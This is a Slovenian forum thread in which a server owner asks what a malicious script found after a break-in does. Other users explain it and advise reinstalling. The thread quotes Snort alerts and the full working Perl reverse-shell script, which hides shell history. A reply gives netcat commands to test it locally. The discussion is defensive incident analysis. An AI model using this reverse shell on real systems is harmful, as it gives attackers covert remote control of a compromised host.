» »

Vlom v server, kaj dela ta skripta?

Vlom v server, kaj dela ta skripta?

meacho ::

Ugotovil sem, da so mi ulomili v server, verjetno prek phpbb foruma.
Load se mi je zelo povečal, zato sem pregledal procese in našel tega: perl temp2006 12.24.28.5 3303
kot je razvidno s snort poročila so z wget funkcijo na server skopirali svojo skripto in jo pognali:

Apr 26 20:54:47 **** snort[2312]: [1:1330:6] WEB-ATTACKS wget command attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80
Apr 26 20:54:47 **** snort[2312]: [1:1356:5] WEB-ATTACKS perl execution attempt [Classification: Web Application Attack] [Priority: 1]: {TCP} 209.125.47.2:39588 -> ***.***.***.***:80

Zanima me kaj izvaja vsebina te skripte ki sem jo našel na serverju, Nod jo prepozna kot Linux/Mare.E, vsebina pa je:

#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("id;pwd;uname -a;w;HISTFILE=/dev/null /bin/sh -i")


Zanima me torej kaj ta skripta naredi? Backdoor? DDos?
Kja naj sedaj naredim s serverjem? Kot sem gledal ni nobene spremembe...

64202 ::

To je remote shell, HISTFILE=/dev/null pa naredi, da se history ne belezi v .bash_history.

Sicer pa lahko probas tkole:
- v enem terminalu pozeni 'netcat -l -p 5000'
- v drugem pa pozeni skripto 'perl skripta 127.0.0.1 5000'

(v prvem t. mas zdaj remote shell)
I am NaN, I am a free man!

Zgodovina sprememb…

  • spremenilo: 64202 ()

64202 ::

Tam kamor se je pa poskusla zadeva povezat, je pa verjetno avtomatski server, ki poslje rootkit.
I am NaN, I am a free man!

Zgodovina sprememb…

  • spremenilo: 64202 ()

BigWhale ::

> Kja naj sedaj naredim s serverjem? Kot sem gledal ni
> nobene spremembe...

Reinstaliraj ga.

meacho ::

Server sem pregledal z rkhunter in chkrootkit, pa ni noben nešel nič sumljivega...
A je za nalaganje rotkita treba dešifrirat kakšno geslo?
Čudno mi je namreč, da je bil load zelo visko ko je bila skripta zagnana...

A je možno da mi niso naložili rootkita?:D
Res se mi ne da še 1x vse nalagati.. Čeprav verjetno mi res ne uide..


Vredno ogleda ...

TemaSporočilaOglediZadnje sporočilo
TemaSporočilaOglediZadnje sporočilo
»

Skripta branje UDP paketov

Oddelek: Programiranje
6869 (703) t0r0
»

Linux varnost (strani: 1 2 )

Oddelek: Informacijska varnost
556770 (5310) fiction
»

Blokada Skypa?

Oddelek: Omrežja in internet
81967 (1752) ABX
»

Skripte (strani: 1 2 )

Oddelek: Programiranje
508324 (6187) Microsoft
»

Vdor v ClarkConnect?

Oddelek: Operacijski sistemi
51847 (1659) Nerdor

Več podobnih tem